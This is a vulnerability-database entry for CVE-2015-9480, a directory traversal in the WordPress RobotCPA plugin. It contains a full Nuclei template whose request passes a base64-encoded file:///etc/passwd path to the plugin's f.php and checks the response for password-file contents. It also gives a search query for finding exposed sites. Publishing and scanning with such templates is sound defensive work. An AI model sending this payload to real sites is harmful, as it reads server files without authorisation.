CVE-2015-9480: WordPress RobotCPA 5 - Directory Traversal

日期: 2025-08-01 | 影响软件: WordPress RobotCPA 5 | POC: 已公开

漏洞描述

The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.

PoC代码[已公开]

id: CVE-2015-9480

info:
  name: WordPress RobotCPA 5 - Directory Traversal
  author: daffainfo
  severity: high
  description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37252
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9480
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-9480
    cwe-id: CWE-22
    epss-score: 0.2916
    epss-percentile: 0.96433
    cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: robot-cpa
    product: robotcpa
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/robotcpa"
  tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8bce8907105d98a0b82cca18591e2b960a2b38bcd5409bc317acde406c9667c022022d59e74223998839964bceafdda7a1a747e723b5ea7a25a97c85fab54f07dac:922c64590222798bb761d5b6d8e72950

相关漏洞推荐